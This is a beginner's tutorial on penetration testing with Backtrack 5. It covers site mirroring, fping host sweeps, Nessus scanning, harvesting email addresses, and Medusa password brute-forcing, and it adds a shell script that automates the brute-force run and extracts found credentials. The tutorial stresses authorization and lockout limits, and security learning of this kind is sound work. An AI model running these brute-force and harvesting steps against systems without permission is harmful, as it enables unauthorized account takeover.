When it comes to learning how to perform penetration testing with Backtrack 5, you probably know how tough it looks. Hopefully, with this Backtrack 5 Tutorial, we’re going to change that for you. What if you don’t even know what penetration testing is? Well, before we get started, we’re going to tell you. In a nutshell, penetration testing is a way for an individual (or company) to test the security of a network by attacking it the way a real intruder would. It sounds a lot like hacking, doesn’t it? Don’t worry! It’s legal as long as you have permission from the owner of the systems you are testing, for example your own network or a client who has authorized the test in writing. Good intentions alone are not enough; running these tools against systems you don’t own or have permission to test is a crime in most countries.
Believe us when we say this, there is a big demand for this. After all, if you can get into a company’s network, then someone else probably can too. You’ll also hear penetration testing referred to as ethical hacking or white hat hacking. Either way, it’s all the same thing. In the Backtrack 5 Tutorial below, we’re going to walk you through the 4 basic steps of penetration testing and teach you what you need to know in order to perform it yourself. Are you ready to get started? Great! Scroll down.
Step 1 – Surveillance
Before we get going with the actual penetration testing, we want to install a free program called “HTTrack” from the Backtrack 5 console. Backtrack 5 logs you in as root, so no sudo is needed; open a terminal and enter:
root@bt:~# apt-get install httrack
Once that’s done, go ahead and type “httrack” into the console to start it. In case you’re wondering, this program mirrors a website, which means it downloads a local copy of every page it can reach on the site before we start the actual penetration testing process. This means you won’t be digging around through the live site and wasting precious time, and you can read the copy as often as you like without generating more traffic. Keep in mind that mirroring is noisy: the crawl shows up in the target’s web logs, and an attentive admin may block your address. That’s one more reason to grab a copy once, early, rather than hammering the live site later.
Next, HTTrack will ask for a project name, a base path where the copy should be stored (you can accept the default), and the URL of the website to copy. Once you enter those and hit enter, you’ll be given a list of actions. To copy the entire website, simply hit “1” on your keyboard. Give it a few minutes and you’ll have a duplicate of the site’s contents on disk.
There are also tools that do the same kind of collection for sub-domains and email addresses. We cover one of them, theHarvester, at the end of Step 2; it’s more of a convenience than a requirement, so don’t worry if you skip it at first. With that being said, it’s about time we move on to Step 2!
Step 2 – Scan The Site
Step 2 is also our favorite step. It’s the actual scanning process and, quite frankly, it’s the least complicated step (or one of them). The first thing to do is find out which hosts in the target’s address range are actually up, and the simplest way to do that is a ping sweep with fping. Enter the following command into the terminal and wait for the results.
The code: fping -a -g 192.0.2.1 192.0.2.254 > hosts.txt
Now, in that command you’ll notice two IP addresses. They are placeholders from a range reserved for documentation, not real hosts, so replace them with the first and last address of the range you are authorized to test. The -g switch tells fping to generate every address from the first one through the last one, and -a tells it to print only the hosts that answer, so hosts.txt ends up as a list of live addresses. fping prints its complaints about unreachable hosts on stderr, so add 2>/dev/null if you want a quiet run. One caveat: a ping sweep only finds hosts that reply to ICMP echo requests. A host behind a firewall that drops ping will be missing from hosts.txt even though it’s up, so treat the list as a starting point, not the whole truth. Make sense?
Once you have these results, we recommend running a vulnerability scan against the live hosts. To install Nessus, enter:
root@bt:~# apt-get install nessus
Nessus needs an activation code from Tenable before it will download its plugin feed, so register for one on their site before the first run. Once everything is installed, you can start it from the menu: click Applications, Backtrack, Vulnerability Assessment, Vulnerability Scanner, Nessus, and finally Nessus Start. Then point a browser at https://127.0.0.1:8834, log in, and start a scan. Then, you wait.
Before you move on to Step 3, we have an additional recommendation that isn’t necessary but will help. You can easily catalog both email addresses and sub-domains associated with the website in question with a simple, easy to use Python script called “theHarvester.” Backtrack 5 already ships it, so you only need to change into its directory and run it:
root@bt:~# cd /pentest/enumeration/theharvester
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d example.com -l 100 -b google
Replace example.com with the target’s domain. The -d switch is the domain to search for, -l caps the number of search results to pull, and -b picks the data source. That last one takes a source name, not a URL: google, bing, linkedin, and pgp are among the choices, and -b all queries every supported source. Basically what this script does is search a public resource for emails and sub-domains associated with the domain you give it, without sending a single packet to the target itself. Again, this isn’t necessary, but the usernames hidden in those email addresses are exactly what you’ll want when it comes time to start the exploitation process. Now, ready to move on?
Step 3 – Exploit The Site In Question
Now we’re at the stage in the game where we’re going to attempt to exploit the target, which is probably what most of you have been waiting for. In other words, it’s crunch time! The first thing you need to do is ensure that you have Medusa installed. Backtrack 5 comes with Medusa pre-installed, but just in case it isn’t there, open your console and type “apt-get update” and then “apt-get install medusa.” That should take care of it for you.
Now, before we move on, keep one thing in mind. Many services will lock an account after too many wrong guesses, and a brute-force tool like Medusa will trip that limit in seconds if you let it. The wordlist doesn’t protect you from that; what helps is keeping the list short and targeted and keeping the guess rate low. Backtrack 5 ships ready-made wordlists, which you can see with “ls /pentest/passwords/wordlists”. Pick one, trim it to a few hundred likely passwords for the target, and then run Medusa like this:
root@bt:~# medusa -h <target IP> -u <username> -P <path to password list> -M <service module>
To make better sense of what you’re reading above, we’re going to break it down for you. The -h switch is the IP address of the host you are attacking (many sites share an IP address these days, so target the host, not a hostname you looked up once).
The -u switch is a single username to try; use -U with a file if you want a list of usernames, for example the ones theHarvester turned up. The -P switch is a file of passwords to try against that user (a lowercase -p gives one password instead). The -M switch names the service module to attack, such as ssh, ftp, or http; run “medusa -d” to list the modules your copy supports, and add -t 1 to test one login at a time so you don’t trigger a lockout. A successful guess shows up in the output as a line starting with “ACCOUNT FOUND”. While this may sound pretty complicated to those of you who have never used Backtrack 5 and are coming to this tutorial with no experience whatsoever, it really isn’t. It will take a little practice, but after a few attempts (on your own systems, please), you’ll get it down. Once you’ve messed with this some and are at least familiar with it, move on to Step 4.
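To show how the four steps fit together as one repeatable run, here is an added POSIX shell script; it is not part of the original tutorial. It wraps httrack, fping, and medusa from the steps above, validates the addresses before they reach any tool, refuses a wordlist longer than a chosen attempt budget (the lockout guard discussed above), and pulls successful logins out of Medusa’s output for Step 4. The 192.0.2.x addresses (a range reserved for documentation), the “admin” user, the darkc0de.lst wordlist path, and the sample Medusa output are all constructed placeholders, and the real tools are only called when they are installed.

```shell
#!/bin/sh
# pentest-run.sh: added wrapper for the tutorial's four steps. Not part of the
# original page. The 192.0.2.x addresses (RFC 5737 documentation range), the
# "admin" user and SAMPLE_MEDUSA_OUTPUT are constructed placeholders.

# Validate a dotted-quad IPv4 address so a typo never reaches fping or medusa.
is_ipv4() {
    case "$1" in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    ip=$1
    n=0
    while [ -n "$ip" ]; do
        octet=${ip%%.*}
        [ "$octet" -le 255 ] || return 1
        n=$((n + 1))
        [ "$ip" = "$octet" ] && break
        ip=${ip#*.}
    done
    [ "$n" -eq 4 ]
}

# Step 1: mirror a site non-interactively. -O is httrack's output directory.
mirror_site() {
    url=$1; out=$2
    command -v httrack >/dev/null 2>&1 || { echo "httrack not installed" >&2; return 2; }
    httrack "$url" -O "$out"
}

# Step 2: ping sweep. fping -a prints alive hosts on stdout and complaints
# about unreachable hosts on stderr, so only stdout goes into the hosts file.
ping_sweep() {
    start=$1; end=$2; out=$3
    is_ipv4 "$start" && is_ipv4 "$end" || { echo "bad IP range" >&2; return 2; }
    fping -a -g "$start" "$end" 2>/dev/null > "$out"
    [ -s "$out" ]    # fping itself exits 1 when any host is down; ignore that
}

# Lockout guard for Step 3: refuse a wordlist bigger than the attempt budget,
# because the list does nothing to stop a lockout policy; a short list does.
check_wordlist() {
    list=$1; budget=$2
    [ -r "$list" ] || { echo "wordlist $list not readable" >&2; return 2; }
    n=$(wc -l < "$list" | tr -d ' ')
    if [ "$n" -gt "$budget" ]; then
        echo "wordlist has $n entries, budget is $budget; trim it first" >&2
        return 1
    fi
}

# Build the command from the tutorial's template. -t caps parallel logins per
# host (default 1 here), which also keeps the guess rate low.
medusa_cmd() {
    host=$1; user=$2; list=$3; module=$4; threads=${5:-1}
    is_ipv4 "$host" || { echo "bad host $host" >&2; return 2; }
    printf 'medusa -h %s -u %s -P %s -M %s -t %s\n' \
        "$host" "$user" "$list" "$module" "$threads"
}

# Step 4: extract hits from Medusa output, which reports a success as
#   ACCOUNT FOUND: [ssh] Host: H User: U Password: P [SUCCESS]
# Prints "host user password" per hit (passwords containing spaces are not handled).
found_accounts() {
    grep 'ACCOUNT FOUND' |
        sed 's/.*Host: \([^ ]*\) User: \([^ ]*\) Password: \([^ ]*\).*/\1 \2 \3/'
}

# Constructed sample of Medusa output for an offline dry run (not a real run).
SAMPLE_MEDUSA_OUTPUT='ACCOUNT CHECK: [ssh] Host: 192.0.2.10 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: password (1 of 3 complete)
ACCOUNT CHECK: [ssh] Host: 192.0.2.10 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: letmein (2 of 3 complete)
ACCOUNT FOUND: [ssh] Host: 192.0.2.10 User: admin Password: Summer2011 [SUCCESS]'

# Full run: only invoked as "sh pentest-run.sh run", so the helpers above can
# be sourced and tested without touching the network.
main() {
    list=/pentest/passwords/wordlists/darkc0de.lst   # Backtrack 5 path (assumed)
    printf '%s\n' "$SAMPLE_MEDUSA_OUTPUT" | found_accounts
    if command -v fping >/dev/null 2>&1; then
        ping_sweep 192.0.2.1 192.0.2.254 hosts.txt && cat hosts.txt
    fi
    check_wordlist "$list" 500 || return 1
    cmd=$(medusa_cmd 192.0.2.10 admin "$list" ssh) || return 1
    echo "would run: $cmd"
}
case "${1:-}" in run) main ;; esac
```

Run it with “sh pentest-run.sh run” on Backtrack 5; on any other machine the sweep and mirror are skipped and the script just demonstrates the validation and result parsing. The attempt budget of 500 is a deliberately small number so that one user is never hit with thousands of guesses; raise it only when you know the target has no lockout policy.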
Step 4 – Compile Results
Now that you’ve gone through the first 3 basic steps, from Surveillance to Exploiting the Site, you’re ready to start compiling basic information and results. Were you able to access the server or website in question? Were you locked out because of too many password attempts? Were you able to get around that? Which hosts answered the sweep, what did Nessus flag, and which credentials worked? Write those down while they’re fresh; a penetration test is only useful if the results end up in a report that tells the owner what to fix. As mentioned above, this will take a little practice and some getting used to, but it’s not a hard piece of software to master.
Best of all, it’s a very valuable piece of software that could potentially save you or your business a lot of money later on down the road. If you can access your own website or server with Backtrack 5, then so can someone else, and you’re at high risk of being hacked. If you store credit card numbers or confidential information on your site, you definitely don’t want this to happen. While this is only a basic Backtrack 5 tutorial that outlines the bare essentials of using the software, there is still a lot to learn. Whether you decide to seek out a quality Backtrack 5 lesson or learn on your own, you’ll find it to be a rewarding, challenging, and technical experience. On top of that, you’ll also learn sound security practices that will enable you to keep your sites and networks safe from hackers. Now, what are you waiting for? It’s time to start mastering Backtrack 5 today!
We know that we said we’d let you go, but we wanted to give you a bonus step that you can use in order to ensure that you have the best Backtrack 5 experience possible. Not many paid Backtrack 5 tutorials are going to give you this information because it’s not something many people think is that serious, but we definitely do. What is it? Well, we recommend regularly updating Backtrack 5. Sometimes you may find that you literally have to update your software multiple times a week, but it’s well worth it: the scanners and password tools above are only as good as their latest signatures and bug fixes. It’s also very easy. Refresh the package lists with “apt-get update”, then install whatever is new with “apt-get upgrade”. Yep, that’s it! The one-liner below does both, plus a dist-upgrade for packages whose dependencies have changed.
root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade
This will ensure that you have all the necessary updates and you’re ready to go the next time you use the software. Many people overlook this step, but just like we said above, we think it’s a pretty serious step to take. The updates are absolutely free and there’s literally no good excuse not to take advantage of them. Since Backtrack 5 is built on Ubuntu 10.04, updates come out pretty often, and for the most part they are quick. One caveat: Backtrack was retired in 2013 when Kali Linux replaced it, so its repositories no longer receive new packages; on Kali the same apt-get commands do the job.
So, with that being said, put in that command before each session of Backtrack 5. This may not get you the updates the moment they come out, but it will ensure that you’re up to date before you use the software. Sound simple enough? That’s because it most definitely is! Now, all that’s left to do is polish your skills, keep your software updated, and go get to work!